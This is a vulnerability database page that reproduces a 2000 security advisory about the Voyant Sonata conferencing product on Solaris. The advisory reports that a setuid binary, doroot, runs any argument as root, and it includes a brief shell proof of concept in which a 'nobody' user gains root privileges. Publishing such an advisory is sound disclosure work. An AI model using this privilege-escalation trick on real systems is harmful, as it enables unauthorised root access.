Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sonata-teleconf-2.txt

🗓️ 22 Dec 2000 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Vulnerability in Sonata conferencing allows local root command execution via doroot binary.

Code
`  
Here you go alan!  
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Vulnerability Report #2 For Voyant Technologies Sonata  
Conferencing product.  
  
Larry W. Cashdollar  
Vapid Labs  
  
  
  
  
Date Published: 12/18/2000  
  
Advisory ID: 12182000-02  
  
CVE CAN: None currently assigned.  
  
Title: Sonata doroot command vulnerability.  
  
Class: Design Error  
  
Remotely Exploitable: no  
  
Locally Exploitable: Yes  
  
Vulnerability Description:  
  
  
The setuid binary doroot does exactly what it says. It executes its  
command line argument as root. This is really silly and I dont know why it would need to exist.  
  
Vulnerable Packages/Systems: Sonata v3.x on Solaris 2.x.  
  
Vendor notified on: 11/30/2000  
  
Solution/Vendor Information/Workaround:  
  
The vendor has told us in so many words that the security of the conferencing system is up to the customer.  
This will make it pretty difficult to make modifications to our system since it is production and we can't have any downtime.  
I would contact Voyant anyhow for a solution. I can not test the affects of removing the setuid bit on our systems until later this week.  
  
Credits:  
  
Larry W. Cashdollar  
http://vapid.betteros.org  
  
Technical Description - Exploit/Concept Code:  
  
  
$ cd /opt/TK/tk4.1/library/demos  
$ id  
uid=60001(nobody) gid=60001(nobody)  
$ ./doroot id  
uid=60001(nobody) gid=60001(nobody) euid=0(root)  
$ ls -l doroot  
- -rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot  
  
References:  
  
Sonata product page.  
http://www.voyanttech.com/displaypage.cfm?pid=27&toppid=22  
  
Vapid Labs.  
http://vapid.betteros.org  
Email: Larry W. Cashdollar <[email protected]>  
  
DISCLAIMER:  
  
The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and  
may be distributed freely provided that no fee is charged for this  
distribution and proper credit is given.  
  
  
Ver 2.4 11/30/2000  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.0.4 (OpenBSD)  
Comment: For info see http://www.gnupg.org  
  
iEYEARECAAYFAjo+7iMACgkQ1HPgUEhXV2j6JwCfXo2oo4exnz5Zq1jHwPRatF4w  
6SMAnA9Q2c/CvMRrGiydj0lqx1wmjZP7  
=8tVa  
-----END PGP SIGNATURE-----  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Dec 2000 00:00Current
7.4High risk
Vulners AI Score7.4
sonata conferencing product local root command doroot binary design error solaris 2.x vulnerability report voyant technologies execution vulnerability security advisory
30